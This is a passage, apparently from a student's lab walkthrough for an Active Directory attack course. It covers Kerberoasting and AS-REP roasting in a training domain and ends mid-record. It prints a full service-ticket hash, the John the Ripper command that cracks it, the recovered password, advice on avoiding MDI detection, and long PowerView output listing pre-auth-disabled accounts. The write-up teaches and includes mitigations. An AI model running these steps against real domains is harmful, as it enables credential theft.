[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 2

[*] SamAccountName : websvc

[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\student163\Desktop\shared\hashes.txt

[*] SamAccountName : svcadmin

[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\student163\Desktop\shared\hashes.txt

[*] Roasted hashes written to : C:\Users\student163\Desktop\shared\hashes.txt

It is always advisable not to kerberoast all the possible accounts since it is very noisy and MDI can easily
detect it since we are generating TGS continuously.

The better way would be to always kerberoast each individual user.

Once we receive the TGS, w can use the hash to decrypt the password. For this we will use John the Ripper
in our lab.

We will first copy the hash we generated to a text file. While copying the hash to the text file, delete the
port information if any. This is because John will not able to crack the hash when we have the port
information. For example, in the TGS we generated, the hash looks like this.
$krb5tgs$23$*svcadmin$DOLLARCORP.MONEYCORP.LOCAL$MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local:1433*$3C2E3BD874DA5BED14ABF5F25E8875BB$BD4B4B4A576518D0F5C7E1303E
C69FCCDA3DA61E4DDA54C96A49F6488F9888C5129A1512EF9E2681081D70A3D8F4595B454BDBC40E0EDBF7888B00472E7
98D7AAFA25E1F27C13641C423412375773CCC2B4FF32D2AE0BC994447EFD9B1EE7DA3A431F083832A31718706B69D28BF
B9D5F2810D4B5E446CE8386E0FD48F66065314C7F654B12E0272DBCC034A29A5A681A13F908E136D9B2177245BFF4C0AD
05620C0C3D6CC7C5B4AA9E173096A97562894242DC329EE7C9171FD2C3CEBD3D8D9266E9B5592AF75C33DCBB074CD5506
FCBF32A1726FCBF32E12390F0BB8F49B1C8486C7C0631B3D344037D8BA3ED86D199311E5C9AAFEEE09783337C59C214BC
9B2686F6FAFB582EBD80B641BFB3F97B9338FD9835A858A8813F111ADBD96A3E2BD1D64753EF4FA87531097449324944A
22E7D1208460C80E4B4CB0478A10EEBEB7D9553D958B0DBF6D100E62D6885A96F9FBB4A9BE5BE786F10E29867CC9A0CE0
0477868B239C03C512D13AFDA5110A99D2ED88710A507DCDE6AC88188ADDB5C462242C1E548AC83E876108EAFB12074E5
9D776C20F7F8BBF8A1A59FABDC924627570B1076000309CA1F6A193D0EC52E5B6D9376D972C8E0CE791315DF4A527DC18
97420B3630AF5F2C27BA0FAE8EB066BA174212DF1DC2C5C8CE4DBAB15E0C1F3614A1D0D3D0583CB928875C009B26B159F
A70ED556D8340AD4F8691A79B24DED77AA7EA957527F49D10894F0036297AA1B01913C199FBF17AE41278DB505FAFE216
31BFE9AF4B94FBF5C9BE215DBE7B5BEA764BD5485325C904D516E811D181C7840C2890135A21BAA80AB8E8EF144874084
7B2133D2E6A69548B610BCD6952779F8D6E4A259502D13A256CEE0488C05FBAD56A6530776955550B739CB27FB1155C69
ECC626152FE19C75E1E3AC6BDBF820E21065DD4C811DC8BAABDA94C2CB2E5A42C34AFD2BEEA4B64D13A8A6BB53B34AA5F
482EED62F32D6CEDAE535ACB78C6D26BD4FA80E82807B8214C09B8BA9EE64F96F278728F4474F170EC359835B4E45A0BD
82854B73FEF4EA1F906A44CADF8D9008C06EAE90BECA2BD7CF8EF4C0B0797C0A4FD6ECB3B56A77DCD64F654CA15011D1D
BFBC11CD22BBB5EA9155F2BCA696FC9F8C0BA684B05A1FD890503FE88ECD74B2CA24D77DA28DB1FA988DBFADEAC4EC71D
3DF7850005BFBF8A5AA4FBD43F9471FCEFA943092F952E04C9C0B5E821BA64C617FE63B3EA3FC068AA11112760A0CCF60
011CB088BED7644E9DE257748C6857418C4A758E68A0413465FAD7A39E74EDD72788D35A2576CEC29CC43DD63D2BA6792
1F0CBEC40FCAC4891EF65DA90697840F22588F52B24EA30BADA604882493907CA05A4168BFB3202BA551177308FFDC7F6
92A2847011339266EF8E4424F5F13AF00DF1DFC4D62C8848122D3FE4294FBFCFBA3017D683DEE42948AF7D49A2F4FEE89
D28CA217A64D70351AC9F9BFE8F7B943ECA284339CE9978F1703270DDD61ABC1294D5FDD0DD205C0FBDF27F1299295173
FC16D299CA3242D001801F34273CF676BE1D5BAB6E585814286C0306F2033316352B8471DF03D8132062E040990A2E9FA
9A5A24F550BE1FF8419D790E847F20111F047106E7EE23D8F8F5158352ED61E955094812D1F2BF828F492239AB061095D
87810161

We will need to remove the :1433 from the hash so that John can decrypt the hash. We copy the hash to
a file called hashes.txt and use John on this hash.
C:\Windows\system32>C:\Ad\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --
wordlist="C:\AD\Tools\kerberoast\10k-worst-pass.txt"
"C:\Users\student163\Desktop\shared\hashes.txt"
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*ThisisBlasphemyThisisMadness!! (?)
1g 0:00:00:00 DONE (2024-07-03 03:19) 41.66g/s 85333p/s 85333c/s 85333C/s energy..mollie
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Mitigation
• Use long and complex passwords for service accounts to make brute-force attacks impractical.
• Regularly monitor service accounts and their usage. Look for abnormal ticket requests and
authentication attempts.
• Use Managed Service Accounts (MSAs) or Group Managed Service Accounts (gMSAs) which
automatically manage passwords and reduce the risk of weak passwords.

Targeted Kerberoasting (AS-REP Roasting)

AS-REP Roasting is an attack technique that targets user accounts in Active Directory that do not require
pre-authentication. This attack allows an adversary to obtain the encrypted part of the Authentication
Service (AS) response, which can then be brute-forced offline to reveal the user’s password.

How AS-REP Roasting Works

Enumerate User Accounts Without Pre-Authentication:

Attackers first identify user accounts that have the setting "Do not require Kerberos preauthentication"
enabled. This can be done using tools like GetUserSPNs.py from the Impacket suite, PowerView, or
Rubeus.

Request AS-REP:

The attacker requests an AS-REP (Authentication Service Response) for these user accounts from the Key
Distribution Center (KDC). Since pre-authentication is not required, the KDC directly returns the AS-REP,
which contains data encrypted with the user's password hash.

Extract Encrypted Data:

The attacker extracts the encrypted part of the AS-REP. This encrypted data can be saved and used for
offline brute-force attacks to recover the user's plaintext password.

Offline Brute-Force Attack:

Using tools like Hashcat or John the Ripper, the attacker performs an offline brute-force or dictionary
attack to crack the encrypted AS-REP data, revealing the user’s password.

With sufficient rights (Generic Write or Generic All) on a user, Kerberos pre-authentication can be force
disabled as well.

Enumeration
Using PowerView
PS C:\Windows\system32> Get-DomainUser -PreAuthNotRequired -Verbose
VERBOSE: [Get-DomainUser] Searching for user accounts that do not require kerberos
preauthenticate
VERBOSE: [Get-DomainUser] filter string:
(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN161User
lastlogontimestamp : 7/3/2024 3:44:52 AM
userprincipalname : VPN161user
samaccountname : VPN161user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:52 AM
instancetype : 4
usncreated : 201392
objectguid : 1d7faaf7-233f-483d-8e17-bcc34c86d6c6
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:03 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:03 AM, 1/1/1601 12:00:00 AM}
givenname : VPN161
usnchanged : 1481283
lastlogon : 7/3/2024 3:44:52 AM
badpwdcount : 0
cn : VPN161User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13661
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:03 AM
name : VPN161User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN162User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN162user
samaccountname : VPN162user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201399
objectguid : a0229c64-9da4-43d9-88be-eb00bd946fc8
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:03 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:03 AM, 1/1/1601 12:00:00 AM}
givenname : VPN162
usnchanged : 1481284
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN162User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13662
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:03 AM
name : VPN162User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN163User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN163user
samaccountname : VPN163user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201406
objectguid : 236ab7bf-a8bd-4e99-8ffa-12bdf7e2f61b
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:03 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN163
usnchanged : 1481285
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN163User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13663
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN163User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN164User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN164user
samaccountname : VPN164user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201413
objectguid : 11210222-24cf-4b41-837d-25f53751852b
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN164
usnchanged : 1481288
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN164User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13664
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN164User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN165User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN165user
samaccountname : VPN165user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201420
objectguid : 19f3740a-7d2f-45cd-96f1-db8890792d2c
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN165
usnchanged : 1481289
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN165User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13665
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN165User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN166User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN166user
samaccountname : VPN166user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201427
objectguid : 5fc085fc-3daa-496b-aea4-0a922a098090
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN166
usnchanged : 1481290
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN166User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13666
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN166User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN167User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN167user
samaccountname : VPN167user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201434
objectguid : 684ed5a2-237d-40de-a794-028b67a37c00
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN167
usnchanged : 1481291
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN167User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13667
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN167User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN168User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN168user
samaccountname : VPN168user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201441
objectguid : 3fa6a688-e880-4324-b6b6-c6a9bd57b2a0
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:04 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:04 AM, 1/1/1601 12:00:00 AM}
givenname : VPN168
usnchanged : 1481294
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN168User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13668
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:04 AM
name : VPN168User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN169User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN169user
samaccountname : VPN169user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201448
objectguid : 6ee585d2-017a-4254-a8c8-9480529f4330
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN169
usnchanged : 1481297
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN169User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13669
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN169User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN170User
lastlogontimestamp : 7/3/2024 3:44:53 AM
userprincipalname : VPN170user
samaccountname : VPN170user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:53 AM
instancetype : 4
usncreated : 201455
objectguid : 0ca9fa48-b3b9-4c83-9ddc-95470629fd25
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN170
usnchanged : 1481300
lastlogon : 7/3/2024 3:44:53 AM
badpwdcount : 0
cn : VPN170User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13670
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN170User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN171User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN171user
samaccountname : VPN171user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201462
objectguid : 767b9d56-90f9-450a-b0e1-68bee9485c80
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN171
usnchanged : 1481310
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN171User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13671
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN171User
logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN172User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN172user
samaccountname : VPN172user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201469
objectguid : 4959eb44-0821-4d01-8de5-78f7656ab3fd
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN172
usnchanged : 1481314
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN172User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13672
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN172User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN173User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN173user
samaccountname : VPN173user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201476
objectguid : 185ff3dd-be78-490e-9b23-e18cbda09e64
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN173
usnchanged : 1481316
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN173User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13673
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN173User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN174User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN174user
samaccountname : VPN174user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201483
objectguid : bd32ff72-94f2-490a-b760-3baf1aef1da1
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN174
usnchanged : 1481317
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN174User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13674
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN174User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN175User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN175user
samaccountname : VPN175user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201490
objectguid : 4810792d-c9a8-4458-922b-870f2ae3e543
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN175
usnchanged : 1481318
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN175User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13675
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN175User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN176User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN176user
samaccountname : VPN176user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201497
objectguid : 80ad17e9-8fbf-4a1a-b767-7baa09339a77
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN176
usnchanged : 1481319
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN176User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13676
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN176User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN177User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN177user
samaccountname : VPN177user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201504
objectguid : a37555a4-68cf-4910-8279-04f0595b857d
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:06 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN177
usnchanged : 1481327
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN177User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13677
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:06 AM
name : VPN177User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN178User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN178user
samaccountname : VPN178user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201511
objectguid : dd7c24f4-5da7-4df0-9d8a-08719ae7c049
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:06 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN178
usnchanged : 1481330
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN178User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13678
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:06 AM
name : VPN178User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN179User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN179user
samaccountname : VPN179user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
